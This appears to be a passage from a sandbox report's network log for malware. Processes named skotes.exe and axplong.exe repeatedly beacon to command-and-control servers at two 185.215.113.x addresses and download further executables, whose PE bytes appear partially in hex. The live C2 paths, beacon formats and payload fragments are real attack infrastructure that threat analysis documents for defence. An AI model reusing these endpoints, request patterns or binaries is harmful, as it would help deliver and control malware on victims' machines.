                                                      103192.168.2.749868185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:45.033761024 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      104192.168.2.749870185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:46.995872021 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      105192.168.2.749871185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:48.522119999 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      106192.168.2.749872185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:49.075258970 CEST53OUTGET /inc/penis.exe HTTP/1.1
                                                      Host: 185.215.113.16


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      107192.168.2.749873185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:50.255012035 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:50.966732025 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:50 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      108192.168.2.749874185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:52.502881050 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:36:53.207607031 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:53 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      109192.168.2.749875185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:54.098577976 CEST53OUTGET /inc/penis.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Sep 24, 2024 15:36:55.507200956 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:54 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 506368
                                                      Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
                                                      Connection: keep-alive
                                                      ETag: "66e099a7-7ba00"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(0>z>\ `@ @[K`v H.textD< > `.rsrcv`x@@@.reloc@B \H4S8*.((*(*(*0s~%:&~&s%(+o8[o%F~(%G~(%H~(%e~(~(o8(ss~}~s(o}{I~(o9I~(8C~(o:{~(8
                                                      Sep 24, 2024 15:36:55.507210970 CEST224INData Raw: 7b 02 00 00 04 7e 1f 03 00 04 28 c2 05 00 06 13 08 00 11 08 28 19 00 00 0a 16 fe 01 13 0a 11 0a 39 d1 03 00 00 00 11 08 16 6f 1a 00 00 0a 13 0c 12 0c 28 1b 00 00 0a 6f 1c 00 00 0a 11 08 16 17 6f 1d 00 00 0a 28 1e 00 00 0a 13 08 11 06 7b 02 00 00
                                                      Data Ascii: {~((9o(oo({~ ((9ssss ~%:&~'s!%(+s ~%:&~(
                                                      Sep 24, 2024 15:36:55.507221937 CEST1236INData Raw: 00 00 06 73 21 00 00 0a 25 80 07 00 00 04 28 02 00 00 2b 13 0f 11 06 fe 06 1d 00 00 06 73 20 00 00 0a 7e 08 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 29 00 00 06 73 21 00 00 0a 25 80 08 00 00 04 28 02 00 00 2b 13 10 11 07 11 08 7e 21 03
                                                      Data Ascii: s!%(+s ~%:&~)s!%(+~!(~"(s"~%:&~*s#%(+~#(~$(s$~%:&~+s%%(+~%
                                                      Sep 24, 2024 15:36:55.507226944 CEST1236INData Raw: 06 06 00 06 00 11 07 11 08 08 17 7e 31 03 00 04 28 0a 06 00 06 7e 32 03 00 04 28 0e 06 00 06 00 00 dd 09 00 00 00 13 09 00 00 dd 00 00 00 00 dd c3 00 00 00 00 11 07 11 07 7e 33 03 00 04 28 12 06 00 06 28 36 00 00 0a 3a 11 00 00 00 11 07 7e 33 03
                                                      Data Ascii: ~1(~2(~3((6:~3(8;~(~/(~4((6:~4(8;~(~0(~5((6:~5(8;~(~2(
                                                      Sep 24, 2024 15:36:55.507237911 CEST1236INData Raw: 11 05 11 06 1e 7e 2e 03 00 04 28 fe 05 00 06 16 6f 1a 00 00 0a 1f 31 fe 01 7e 3b 03 00 04 28 32 06 00 06 00 25 11 05 11 06 1d 7e 2e 03 00 04 28 fe 05 00 06 6f 35 00 00 0a 28 3f 00 00 0a 20 40 42 0f 00 6a 5b 21 00 91 10 b6 02 00 00 00 59 7e 3c 03
                                                      Data Ascii: ~.(o1~;(2%~.(o5(? @Bj[!Y~<(6%~.(o5~=(:% ~(~>(>~1(~?(B~@(Fj92(@(A(B!Y~<
                                                      Sep 24, 2024 15:36:55.507242918 CEST1236INData Raw: 00 06 13 09 20 06 00 00 00 7e c4 02 00 04 7b 1a 03 00 04 3a a8 ff ff ff 26 20 00 00 00 00 38 9d ff ff ff 00 73 c6 03 00 06 25 11 10 7e 44 03 00 04 28 56 06 00 06 00 25 11 12 7e 45 03 00 04 28 5a 06 00 06 00 13 00 20 07 00 00 00 38 6f ff ff ff 00
                                                      Data Ascii: ~{:& 8s%~D(V%~E(Z 8o ~{:V& 8K~E(Z8s 8%%-oG~D(V88^ ~{9& 8~.(
                                                      Sep 24, 2024 15:36:55.507253885 CEST1236INData Raw: 00 00 00 00 00 dd 09 00 00 00 13 0b 00 00 dd 00 00 00 00 06 13 04 38 00 00 00 00 11 04 2a 00 41 4c 00 00 00 00 00 00 6d 00 00 00 ae 00 00 00 1b 01 00 00 08 00 00 00 12 00 00 01 00 00 00 00 3f 00 00 00 21 01 00 00 60 01 00 00 09 00 00 00 16 00 00
                                                      Data Ascii: 8*ALm?!`ho08E8*~8-88 ~{:& 8ov@ ~{9
                                                      Sep 24, 2024 15:36:55.507260084 CEST1236INData Raw: 20 0f 00 00 00 38 50 fe ff ff 00 00 7e 11 00 00 04 39 1b 00 00 00 38 3f 00 00 00 fe 0c 05 00 45 02 00 00 00 05 00 00 00 b1 01 00 00 38 00 00 00 00 16 d0 0b 00 00 01 28 18 00 00 06 d0 02 00 00 02 28 18 00 00 06 28 4c 00 00 0a 28 4d 00 00 0a 80 11
                                                      Data Ascii: 8P~98?E8(((L(M8$8 ~{9& 8~{N~~980rp(9%(O(P(Q~{R~~984(
                                                      Sep 24, 2024 15:36:55.507266045 CEST844INData Raw: 58 0a 06 18 fe 02 0c 08 39 08 00 00 00 00 07 0d 38 1b 00 00 00 00 03 07 6f 5e 00 00 0a 16 fe 01 13 04 11 04 3a cd ff ff ff 07 0d 38 00 00 00 00 09 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 33 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 47 00 00 0a 2a
                                                      Data Ascii: X98o^:8*>(3*:oG*&~*~**o5*:o*.(_*Jo:*>(Z*.(V*>(O*0s,_~((e
                                                      Sep 24, 2024 15:36:55.507298946 CEST1160INData Raw: 00 00 0a 11 02 28 38 00 00 06 28 39 00 00 06 16 11 02 28 38 00 00 06 6f 72 00 00 0a 28 3a 00 00 06 28 3b 00 00 06 7e 32 03 00 04 28 0e 06 00 06 20 01 00 00 00 7e c4 02 00 04 7b bf 02 00 04 3a 6d ff ff ff 26 20 01 00 00 00 38 62 ff ff ff 11 03 39
                                                      Data Ascii: (8(9(8or(:(;~2( ~{:m& 8b9e8(6c~((7 ~{:'& 898Zosd~((7 ~{:& 8(6a~((7
                                                      Sep 24, 2024 15:36:55.507322073 CEST1236INData Raw: 00 00 11 7e 4e 03 00 04 28 7e 06 00 06 38 00 00 00 00 7e 4f 03 00 04 28 82 06 00 06 38 00 00 00 00 02 28 60 00 00 0a 20 00 00 00 00 7e c4 02 00 04 7b 0f 03 00 04 39 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 b8 ff ff ff fe 0c 00 00 45 01 00
                                                      Data Ascii: ~N(~8~O(8(` ~{9& 88E8**on**oo**os*>(t**op**ou*N(v*:ow**o2**o1*.(*
                                                      Sep 24, 2024 15:36:55.507549047 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:54 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 506368
                                                      Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
                                                      Connection: keep-alive
                                                      ETag: "66e099a7-7ba00"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(0>z>\ `@ @[K`v H.textD< > `.rsrcv`x@@@.reloc@B \H4S8*.((*(*(*0s~%:&~&s%(+o8[o%F~(%G~(%H~(%e~(~(o8(ss~}~s(o}{I~(o9I~(8C~(o:{~(8
                                                      Sep 24, 2024 15:36:55.507834911 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:54 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 506368
                                                      Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
                                                      Connection: keep-alive
                                                      ETag: "66e099a7-7ba00"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(0>z>\ `@ @[K`v H.textD< > `.rsrcv`x@@@.reloc@B \H4S8*.((*(*(*0s~%:&~&s%(+o8[o%F~(%G~(%H~(%e~(~(o8(ss~}~s(o}{I~(o9I~(8C~(o:{~(8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      110192.168.2.749876185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:55.509788990 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:56.209332943 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:56 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      111192.168.2.749877185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:58.026277065 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:36:58.724440098 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      112192.168.2.749878185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:00.365199089 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:01.094702959 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      113192.168.2.749879185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:00.839893103 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000254001&unit=246122658369
                                                      Sep 24, 2024 15:37:01.564683914 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:01 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      114192.168.2.749880185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:02.016880035 CEST58OUTGET /dobre/acentric.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Sep 24, 2024 15:37:02.723026991 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:02 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 464896
                                                      Last-Modified: Sat, 07 Sep 2024 22:52:49 GMT
                                                      Connection: keep-alive
                                                      ETag: "66dcd941-71800"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 d8 dc 66 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 04 00 00 ca 02 00 00 00 00 00 76 6b 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 07 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 6b 04 00 4f 00 00 00 00 80 04 00 e4 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 07 00 0c 00 00 00 ec 69 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf"0Lvk @ `$kO`i H.text|K L `.rsrcN@@.reloc`@BXkH(6,b00I~}( (( <({rpoo&*0(' u5C w)F5 C6; w)F.}8M d?^; c.P u;8* O5 np; O.v8 R,.W G; BJ./8rp(:8r'p(:8r-p(:8r5p(-t8r9p(-h8rCp(-\+xrMp(-S+ir
                                                      Sep 24, 2024 15:37:02.723036051 CEST1236INData Raw: 55 00 00 70 28 19 00 00 0a 2d 4a 2b 5a 03 72 5f 00 00 70 28 19 00 00 0a 2d 41 2b 4b 03 72 67 00 00 70 28 19 00 00 0a 2d 38 2b 3c 72 6d 00 00 70 2a 72 7d 00 00 70 2a 72 83 00 00 70 2a 72 8b 00 00 70 2a 72 8f 00 00 70 2a 72 a1 00 00 70 2a 72 ab 00
                                                      Data Ascii: Up(-J+Zr_p(-A+Krgp(-8+<rmp*r}p*rp*rp*rp*rp*rp*rp*rp*rp*rp*0c{o3T{{o%}(o{o6%.o{(o*03{o
                                                      Sep 24, 2024 15:37:02.723047972 CEST1236INData Raw: 00 0a 7d 10 00 00 04 02 73 45 00 00 0a 7d 11 00 00 04 02 73 44 00 00 0a 7d 12 00 00 04 02 73 44 00 00 0a 7d 08 00 00 04 02 73 44 00 00 0a 7d 13 00 00 04 02 73 44 00 00 0a 7d 14 00 00 04 02 73 44 00 00 0a 7d 15 00 00 04 02 73 44 00 00 0a 7d 16 00
                                                      Data Ascii: }sE}sD}sD}sD}sD}sD}sD}sE}sD}sD}sD}sD}sD}sD}sD}sD} sD}!sD}"sF}sG}sH}sI
                                                      Sep 24, 2024 15:37:02.723093033 CEST1236INData Raw: 70 6f 5d 00 00 0a 02 7b 12 00 00 04 02 fe 06 10 00 00 06 73 60 00 00 0a 6f 61 00 00 0a 02 7b 08 00 00 04 6f 5a 00 00 0a 1c 8d 4b 00 00 01 25 16 02 7b 13 00 00 04 a2 25 17 02 7b 14 00 00 04 a2 25 18 02 7b 15 00 00 04 a2 25 19 02 7b 16 00 00 04 a2
                                                      Data Ascii: po]{s`oa{oZK%{%{%{%{%{%{oY{rpo[{'sQo\{rpo]{rpo[{ sQo\{r7po]{s`oa{r{
                                                      Sep 24, 2024 15:37:02.723098993 CEST1236INData Raw: 00 70 6f 5d 00 00 0a 02 7b 21 00 00 04 02 fe 06 14 00 00 06 73 60 00 00 0a 6f 61 00 00 0a 02 7b 22 00 00 04 72 53 08 00 70 6f 5b 00 00 0a 02 7b 22 00 00 04 1f 70 1f 16 73 51 00 00 0a 6f 5c 00 00 0a 02 7b 22 00 00 04 72 85 08 00 70 6f 5d 00 00 0a
                                                      Data Ascii: po]{!s`oa{"rSpo[{"psQo\{"rpo]{"s`oa{oc{rpod{rpoe{r9p"4AsLof{og{oh{oi{oj{ sM
                                                      Sep 24, 2024 15:37:02.723109961 CEST1236INData Raw: 1b 28 85 00 00 0a 02 72 aa 0a 00 70 28 50 00 00 0a 02 72 b6 0a 00 70 6f 1d 00 00 0a 02 17 28 86 00 00 0a 02 7b 24 00 00 04 6f 87 00 00 0a 02 16 28 77 00 00 0a 02 28 78 00 00 0a 2a 5a 28 88 00 00 0a 16 28 89 00 00 0a 73 01 00 00 06 28 8a 00 00 0a
                                                      Data Ascii: (rp(Prpo({$o(w(x*Z((s(*(*~'-rp(@os'~'*~(*(*j( rp~(ot*~)*(*Vs%(t)*0,,' +o
